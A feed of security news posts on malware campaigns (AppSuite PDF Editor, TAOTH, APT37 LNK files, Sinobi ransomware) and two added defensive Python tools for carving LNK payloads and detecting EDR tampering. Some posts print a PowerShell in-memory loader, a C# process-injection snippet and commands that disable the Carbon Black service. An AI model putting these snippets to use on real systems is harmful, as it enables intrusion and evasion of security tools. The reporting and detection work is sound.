• A sophisticated malware campaign has emerged targeting users seeking free PDF editing software, with cybercriminals distributing a malicious application masquerading as the legitimate “AppSuite PDF Editor.”

    The malware, packaged as a Microsoft Installer (MSI) file, has been distributed through high-ranking websites designed to appear as legitimate download portals for productivity tools.

    These deceptive sites share striking similarities to previously identified trojan distribution networks, including the notorious JustAskJacky campaign.

    The threat actors behind this campaign have demonstrated unprecedented boldness by submitting their malware to antivirus companies as false positives, attempting to have security detections removed.

    Initially flagged as a potentially unwanted program, the application appeared to offer legitimate PDF editing functionality while concealing its true malicious nature.

    The installer, created using the open-source WiX toolset, immediately downloads the actual PDF editor program from vault.appsuites.ai upon execution and acceptance of the End User License Agreement.

    G Data researchers identified the malware as a classic trojan horse containing a sophisticated backdoor component.

    Their analysis revealed that the application is built on the Electron framework, allowing it to function as a cross-platform desktop application using JavaScript.

    The researchers noted that the malware has generated significant download activity, with over 28,000 download attempts recorded in their telemetry within a single week, highlighting the campaign’s extensive reach and potential impact on users worldwide.

    The malware operates through a complex system of command-line switches that control various backdoor functionalities.

    When executed without specific parameters, the application initiates an installation routine that registers the infected system with command and control servers located at appsuites.ai and sdk.appsuites.ai.

    The registration process involves obtaining a unique installation ID and creating persistent scheduled tasks named “PDFEditorScheduledTask” and “PDFEditorUScheduledTask” that ensure the malware remains active on the compromised system.

    Advanced Persistence and Command Execution Mechanisms

    The most concerning aspect of the AppSuite PDF Editor malware lies in its sophisticated command execution capabilities and persistence mechanisms.

    The malware employs multiple command-line switches that translate into what the developers internally refer to as “wc routines,” including --install, --ping, --check, --reboot, and --cleanup functions.

    Each routine serves a specific purpose in maintaining system compromise and facilitating remote control.

    The backdoor’s most dangerous feature is its ability to execute arbitrary commands on infected systems through server-supplied command templates.

    The malware contacts sdk.appsuites.ai/api/s3/options to retrieve flexible command templates that can be dynamically adjusted by the threat actors.

    This architecture allows attackers to adapt their approach based on the specific environment and security posture of each compromised system.

    // Command template execution mechanism
    hxxps://sdk.appsuites(dot)ai/api/s3/options

    The persistence strategy involves creating multiple scheduled tasks with carefully calculated execution delays.

    The primary scheduled task executes 1 day, 0 hours, and 2 minutes after installation, specifically designed to evade automatic sandbox detection systems that typically do not monitor for such extended periods.

    PDF editor is advertised on various websites with different designs (Source – G Data)

    Additionally, the malware targets popular browsers including Wave, Shift, OneLaunch, Chrome, and Edge, extracting encryption keys and manipulating browser preferences to maintain long-term access to user data and credentials.

    MSI file metadata showing WiX Toolset origins (Source – G Data)

    The malware’s communication protocol utilizes AES-128-CBC and AES-256-CBC encryption for secure data transmission with command and control servers, making network-based detection significantly more challenging for traditional security solutions.


    The post AppSuite PDF Editor Hacked to Execute Arbitrary Commands on The Infected System appeared first on Cyber Security News.


  • In June 2025, a previously undocumented campaign leveraging end-of-support software began surfacing in telemetry data gathered across Eastern Asia. Dubbed TAOTH, the operation exploits an abandoned Chinese input method editor (IME), Sogou Zhuyin, to deliver multiple malware families.

    Initial intelligence indicated that victims, primarily traditional Chinese users and dissidents, downloaded what appeared to be legitimate updates before their systems were compromised.

    The unexpected revival of a discontinued IME update server enabled threat actors to hijack software distribution and covertly install backdoors, spy tools, and loaders without raising suspicion.

    Trend Micro researchers identified a surge in malicious activity when the lapsed domain for Sogou Zhuyin, dormant since mid-2019, began serving a malicious installer as early as November 2024. The compromised updater, ZhuyinUp.exe, connects to a weaponized update configuration endpoint to retrieve the payload manifest.

    Infected systems subsequently download one of four distinct malware families—TOSHIS, DESFY, GTELAM, or C6DOOR—each designed for reconnaissance, information theft, persistence, or remote access.

    Over several months, hundreds of high-value individuals, including journalists, technology executives, and activists across Taiwan, Hong Kong, Japan, and overseas Taiwanese communities, fell victim to these silent intrusions.

    Trend Micro analysts noted that the campaign’s sophistication lies not only in its use of an abandoned software supply chain but also in its multi-stage infection process.

    By combining hijacked software updates with spear-phishing operations, the threat actors achieved broad distribution and selective targeting. Victims who clicked on a malicious link or opened a decoy document found their desktops compromised within hours.

    Post-infection telemetry revealed additional reconnaissance activities, such as directory enumeration, environment fingerprinting, and secure tunnel creation via legitimate cloud services.

    In one key discovery, Trend Micro researchers identified how ZhuyinUp.exe retrieves the malicious update configuration:

    sub_440110(L"https://srv-pc.sogouzhuyin.com/v1/upgrade/version", config_buffer);
    wcscpy_s(Destination, 100, L"SOGOU_UPDATER");
    sub_419620(Destination, (int)this, flags);

    This snippet demonstrates how the updater queries a remote server for the next payload.

    The infection chain for the first operation (Source – Trend Micro)

    The configuration file returned contains URLs, MD5 hashes, and file sizes, enabling the attacker to verify and execute only their crafted binaries.

    Infection Mechanism and Persistence

    Once the malicious updater launches, the chosen payload—often TOSHIS—patches the entry point of a legitimate executable to inject shellcode.

    The loader calculates API function hashes using an Adler-32 algorithm, then downloads and decrypts the final backdoor payload with a hard-coded AES key (qazxswedcvfrtgbn).

    The infection chain for the second operation (Source – Trend Micro)

    In the case of C6DOOR, the Go-based backdoor supports HTTP and WebSocket communication and allows operators to execute shellcode, capture screenshots, and transfer files via SFTP.

    To maintain persistence, the malware registers a service named “SOGOU_UPDATER” under the LocalSystem account, ensuring that the compromised IME re-invokes the update routine on each system start.

    By abusing native Windows update mechanisms and embedding itself in trusted processes, TAOTH remains highly stealthy, evading most traditional endpoint defenses.


    The post New TAOTH Campaign Exploits End-of-Support Software to Distribute Malware and Collect Sensitive Data appeared first on Cyber Security News.


  • A clandestine campaign in which threat actors are weaponizing a legitimate-looking PDF document, titled “국가정보연구회 소식지 (52호)” (National Intelligence Research Society Newsletter – Issue 52), alongside a malicious Windows shortcut (LNK) file named 국가정보연구회 소식지(52호).pdf.LNK. The attackers distribute both files together—either within the same archive or as seemingly related attachments. When victims open the LNK […]

    The post Weaponized PDFs and LNK Files Used in Windows Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Attackers have begun leveraging a seemingly innocuous PDF newsletter alongside a malicious Windows shortcut (LNK) file to infiltrate enterprise environments.

    The attack surfaced in late August 2025, targeting South Korean academic and government institutions under the guise of a legitimate “국가정보연구회 소식지 (52호)” PDF newsletter.

    Victims receive an archive containing both the PDF decoy and a companion .lnk file masquerading as the newsletter. When the shortcut is executed, a multi‐stage PowerShell loader embedded within the LNK unpacks and deploys additional payloads entirely in memory, evading disk‐based detection.

    Early analysis revealed that the LNK file hides three binary payloads at precise offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a final executable at 0x0015AED2.

    Upon execution, a PowerShell one-liner within the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, and then kicks off a batch script (aio03.bat) to decode and run the loader.

    Seqrite analysts noted that this fileless approach allows the attackers to bypass signature‐based defenses by never writing the ultimate payload to disk.

    Subsequent investigation by Seqrite researchers identified that the final payload, once decrypted with a single‐byte XOR key (0x35), is injected directly into memory via Windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.

    This reflective DLL injection technique ensures that the malicious code executes in a stealthy manner, leaving minimal forensic artifacts.

    Detailed reverse engineering of the loader binary uncovered environment checks for VMware tools and sandbox evasion routines that prevent execution in analysis environments, confirming the high sophistication of the threat actor known as APT37.

    Campaign 1 infection chain (Source – Seqrite)

    # Loader routine as published in the report: XOR-decode the staged file,
    # copy it into an executable buffer and start a thread on it.
    # The [Win32] P/Invoke wrapper and $old are not part of the published excerpt.
    $exePath = "$env:temp\tony31.dat"
    $exeFile = Get-Content -Path $exePath -Encoding Byte
    $key = 0x37
    for ($i = 0; $i -lt $exeFile.Length; $i++) {
        $exeFile[$i] = $exeFile[$i] -bxor $key
    }
    $buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)
    [Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)
    [Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
    [Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)

    Infection Mechanism

    The infection begins when the user double‐clicks the deceptive .lnk file, which triggers PowerShell under the hood.

    Campaign 2 infection chain (Source – Seqrite)

    The script parses its own binary content using Get-Item and ReadAllBytes, extracting the decoy PDF for display while staging the real payloads.

    Once staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script stored in aio02.dat, which in turn orchestrates the XOR decryption and reflective injection of aio01.dat.

    By leveraging in-memory execution, the attackers sidestep conventional endpoint protection platforms that rely on disk‐based scanning.

    This layered infection chain, combining decoy documents, embedded payloads, and fileless techniques, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.
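    A triage helper for shortcut files built the way the article describes, added here as an example (not Seqrite's tooling and not the malware's own code): it checks the ShellLink header, splits the file at the three reported offsets, identifies each segment, and generalises the single-byte XOR case by deriving the key from the expected MZ header rather than assuming 0x35. The sample LNK it runs on is constructed; the 0x10000 "oversized" threshold is an assumption.

```python
"""Carve and classify payloads embedded in an oversized .LNK file (added example)."""
from __future__ import annotations

LNK_HEADER_SIZE = b"\x4c\x00\x00\x00"  # ShellLinkHeader.HeaderSize is always 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
REPORTED_OFFSETS = (0x0000102C, 0x0007EDC1, 0x0015AED2)  # decoy PDF, loader, final EXE


def looks_like_lnk(data: bytes) -> bool:
    return data[:4] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def xor_bytes(blob: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in blob)


def classify(blob: bytes) -> tuple[str, int | None]:
    """Identify a carved segment. Returns (kind, single-byte XOR key or None)."""
    if blob.startswith(b"%PDF"):
        return "pdf", None
    if blob.startswith(b"MZ"):
        return "pe", None
    # Generalisation of the 0x35 case: the key is whatever turns the first
    # byte into 'M'; it is confirmed if the same key turns the second into 'Z'.
    if len(blob) >= 2:
        key = blob[0] ^ 0x4D
        if blob[1] ^ key == 0x5A:
            return "pe-xor", key
    return "unknown", None


def carve(data: bytes, offsets=REPORTED_OFFSETS) -> list[dict]:
    """Split the file at each offset (up to the next one) and classify every piece."""
    bounds = sorted(o for o in offsets if o < len(data)) + [len(data)]
    findings = []
    for start, end in zip(bounds, bounds[1:]):
        kind, key = classify(data[start:end])
        findings.append({"offset": start, "size": end - start, "kind": kind, "key": key})
    return findings


def triage(data: bytes) -> dict:
    # Assumption: a genuine shortcut is a few KB; anything past 64 KiB deserves a look.
    return {"is_lnk": looks_like_lnk(data), "oversized": len(data) > 0x10000,
            "payloads": carve(data)}


def build_sample() -> bytes:
    """Constructed look-alike: valid LNK header magic plus three embedded blobs."""
    buf = bytearray(REPORTED_OFFSETS[-1] + 0x200)
    buf[:20] = LNK_HEADER_SIZE + LNK_CLSID
    buf[REPORTED_OFFSETS[0]:REPORTED_OFFSETS[0] + 8] = b"%PDF-1.4"
    buf[REPORTED_OFFSETS[1]:REPORTED_OFFSETS[1] + 4] = b"MZ\x90\x00"  # loader, left plain here
    fake_exe = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"  # minimal stand-in, not a real PE
    buf[REPORTED_OFFSETS[2]:REPORTED_OFFSETS[2] + len(fake_exe)] = xor_bytes(fake_exe, 0x35)
    return bytes(buf)


if __name__ == "__main__":
    for hit in triage(build_sample())["payloads"]:
        print(hit)
```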


    The post Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems appeared first on Cyber Security News.


  • A recently uncovered vulnerability in the Visual Studio Code (VS Code) Marketplace has allowed malicious actors to hijack discontinued extension names and slip malware past unsuspecting developers. In June, ReversingLabs (RL) researchers discovered a new malicious extension, ahbanC.shiba, that bore the same “shiba” identifier as a ransomware-capable extension removed in March—despite official documentation asserting extension […]

    The post VS Code Marketplace Abused by Threat Actors to Deliver Malware via Trusted Extensions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • As students and staff returned to campuses this August, a stark rise in cyber attacks against educational institutions has been observed worldwide.

    From January to July 2025, organizations in the education sector endured an average of 4,356 weekly attacks, marking a 41 percent year-over-year increase. These assaults range from credential-harvesting phishing domains to sophisticated delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.

    The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both volume and sophistication of these threats, exploiting end-user urgency and reliance on digital platforms.

    Attacks have struck uniformly across all regions, but Asia-Pacific organizations faced the heaviest onslaught, with 7,869 average weekly attacks per organization.

    North America saw the steepest spike, rising 67 percent YoY, while Europe and Africa recorded increases of 48 percent and 56 percent respectively.

    At the country level, Italy led with 8,593 attacks per organization, followed by Hong Kong at 5,399, Portugal at 5,488, and the United States at 2,912.

    Check Point analysts noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.

    Beyond sheer volume, attackers have refined their techniques. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.

    These domains often host impersonation pages that mimic Microsoft’s login interfaces. Check Point researchers identified multiple campaigns where malware payloads were delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders.

    Infection Mechanism

    A deeper look at the malware’s infection chain reveals a multi-stage process designed for persistence and evasion.

    Initial compromise begins with a phishing email containing either a crafted SVG file or a PDF disguised as a university communication.

    When opened, the SVG invokes an embedded JavaScript that fetches a payload from a typo-squatted domain.

    // Simplified loader injection snippet
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    
    class Injector {
        [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int a, bool b, int c);
        [DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] data, int size, out IntPtr written);
        [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr h, IntPtr lp, uint sz, IntPtr start, IntPtr arg, uint flags, out IntPtr id);
    
        static void Main(string[] args) {
            Process target = Process.Start("svchost.exe");
            IntPtr h = OpenProcess(0x1F0FFF, false, target.Id);
            byte[] shellcode = Convert.FromBase64String("..."); // encrypted payload
            WriteProcessMemory(h, target.MainModule.BaseAddress, shellcode, shellcode.Length, out _);
            CreateRemoteThread(h, IntPtr.Zero, 0, target.MainModule.BaseAddress, IntPtr.Zero, 0, out _);
        }
    }

    The payload is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence.

    Metric                                      Value
    Average Weekly Attacks (Global)             4,356
    Year-over-Year Increase                     +41 percent
    APAC Average Weekly Attacks                 7,869
    North America YoY Increase                  +67 percent
    Europe YoY Increase                         +48 percent
    Africa YoY Increase                         +56 percent
    Italy Attacks per Organization              8,593
    United States Attacks per Organization      2,912
    Malicious Academic-themed Domains (July)    1 in 57

    Detection evasion is achieved using process hollowing: the loader spawns a legitimate process (e.g., svchost[.]exe), unmaps its memory, and injects malicious code into the hollowed instance.


    The post Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season appeared first on Cyber Security News.


  • A sophisticated ransomware attack has emerged targeting organizations through compromised third-party managed service provider (MSP) credentials, showcasing the evolving tactics of cybercriminals in 2025.

    The Sinobi Group, operating as a Ransomware-as-a-Service (RaaS) affiliate, successfully infiltrated corporate networks by exploiting SonicWall SSL VPN credentials mapped to over-privileged Active Directory accounts with domain administrator rights.

    The attack campaign demonstrates a concerning trend where threat actors leverage trusted third-party relationships to gain initial network access, bypassing traditional perimeter defenses.

    Once inside the network, the attackers established persistence by creating new administrator accounts and executing lateral movement across the compromised infrastructure, ultimately deploying the Sinobi ransomware payload across local and shared network drives.

    eSentire analysts identified significant code overlaps between Sinobi and the previously known Lynx ransomware, suggesting that Sinobi represents a rebrand of the Lynx RaaS operation that first emerged in 2024.

    The security researchers noted with medium confidence that the Lynx group likely purchased the INC Ransomware source code from a user named “salfetka” through underground hacking forums, indicating the commercialization of ransomware development tools.

    Lynx vs Sinobi leak-site comparison (Source – eSentire)

    The malware’s technical sophistication becomes apparent through its systematic approach to disabling security controls and maximizing encryption impact.

    Upon gaining access, the threat actors attempted to uninstall Carbon Black EDR using both Revo Uninstaller and command-line operations, eventually succeeding after discovering deregistration codes stored on mapped network drives.

    Advanced Encryption and Data Exfiltration Mechanisms

    The Sinobi ransomware employs a robust cryptographic implementation using Curve-25519 Donna combined with AES-128-CTR encryption, making file recovery impossible without the attacker’s private key.

    The malware generates unique encryption keys for each file through the CryptGenRandom function, ensuring cryptographically secure key generation that eliminates potential decryption opportunities.

    Prior to encryption, the ransomware systematically prepares the target environment by deleting volume shadow copies through a sophisticated technique utilizing DeviceIOControl with the IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code.

    The malware executes the following command sequence:

    sc config cbdefense start= disabled
    cmd /c sc config cbdefense binpath= "C:\programdata\bin.exe" & shutdown /r /t 0
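    A detection sketch for the command sequence above, added here as an example and not eSentire's detection content: it flags process-creation command lines that set an EDR service (only cbdefense, the service the article names) to a disabled start type, redirect its binary path outside trusted install roots, or chain an immediate reboot onto the reconfiguration. The log format and sample lines are constructed; the trusted-root list is an assumption.

```python
"""Flag EDR service tampering via sc config in process-creation logs (added example)."""
from __future__ import annotations
import re

EDR_SERVICES = {"cbdefense"}  # from the article; extend with your own EDR service names
TRUSTED_BIN_ROOTS = (r"c:\program files", r"c:\windows\system32")  # assumption

SC_CONFIG = re.compile(r"\bsc(?:\.exe)?\s+config\s+(?P<svc>\S+)\s+(?P<args>.*)", re.I)
START_DISABLED = re.compile(r"\bstart=\s*disabled\b", re.I)
BINPATH = re.compile(r'\bbinpath=\s*"?(?P<path>[^"&]+?)"?\s*(?:&|$)', re.I)
REBOOT = re.compile(r"\bshutdown(?:\.exe)?\s+(?:/r|-r)\b", re.I)


def analyse_command(cmd: str) -> list[str]:
    """Return the reasons a single command line looks like EDR service tampering."""
    reasons: list[str] = []
    m = SC_CONFIG.search(cmd)
    if not m or m.group("svc").lower() not in EDR_SERVICES:
        return reasons  # sc config against a non-security service is routine admin work
    svc, args = m.group("svc"), m.group("args")
    if START_DISABLED.search(args):
        reasons.append(f"{svc}: start type set to disabled")
    b = BINPATH.search(args)
    if b:
        path = b.group("path").strip().lower()
        if not path.startswith(TRUSTED_BIN_ROOTS):
            reasons.append(f"{svc}: binary path redirected to {path}")
    if REBOOT.search(cmd):
        reasons.append(f"{svc}: reboot chained to the service reconfiguration")
    return reasons


def scan(log_lines: list[str]) -> dict[str, list[str]]:
    """Group findings per host. Constructed line format: '<time>|<host>|<user>|<command line>'."""
    findings: dict[str, list[str]] = {}
    for line in log_lines:
        try:
            _, host, _, cmd = line.split("|", 3)
        except ValueError:
            continue  # malformed line; skip rather than crash the sweep
        for reason in analyse_command(cmd):
            findings.setdefault(host, []).append(reason)
    return findings


# Constructed sample events: WS01 mirrors the article's sequence, WS02 is benign.
SAMPLE_LOG = [
    "2025-08-10T02:14:05|WS01|DOMAIN\\svc_msp|sc config cbdefense start= disabled",
    "2025-08-10T02:14:09|WS01|DOMAIN\\svc_msp|cmd /c sc config cbdefense binpath= "
    "\"C:\\programdata\\bin.exe\" & shutdown /r /t 0",
    "2025-08-10T02:20:00|WS02|DOMAIN\\alice|sc query cbdefense",
    "2025-08-10T02:21:00|WS02|DOMAIN\\alice|sc config spooler start= disabled",
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG).items():
        print(host, reasons)
```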

    Data exfiltration occurs through RClone, a legitimate cloud transfer utility, directing stolen information to servers operated by Global Connectivity Solutions LLP, a hosting provider frequently observed in cyberattacks.

    Ransom note wallpaper (Source – eSentire)

    The ransomware creates encrypted files with the .SINOBI extension and deploys README.txt ransom notes containing Tor-based communication channels and payment instructions, demanding victims negotiate within seven days to prevent data publication on dark web leak sites.

    The attack underscores the critical importance of implementing strict privilege management for remote access accounts and avoiding storage of security tool deregistration codes in accessible network locations.


    The post Hackers Leverage Compromised Third-Party SonicWall SSL VPN Credentials to Deploy Sinobi Ransomware appeared first on Cyber Security News.


  • A sophisticated backdoor in AppSuite PDF Editor that enables threat actors to execute arbitrary commands on compromised Windows systems. Initially flagged as a potentially unwanted program due to its aggressive installation behavior, AppSuite’s true nature was revealed when its malicious components were deobfuscated and analyzed. Threat actors exploited high-ranking PDF tool websites to distribute a […]

    The post AppSuite PDF Editor Exploit Lets Hackers Run Arbitrary Commands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Amazon on Friday said it flagged and disrupted what it described as an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors as part of their intelligence gathering efforts. The campaign used “compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code
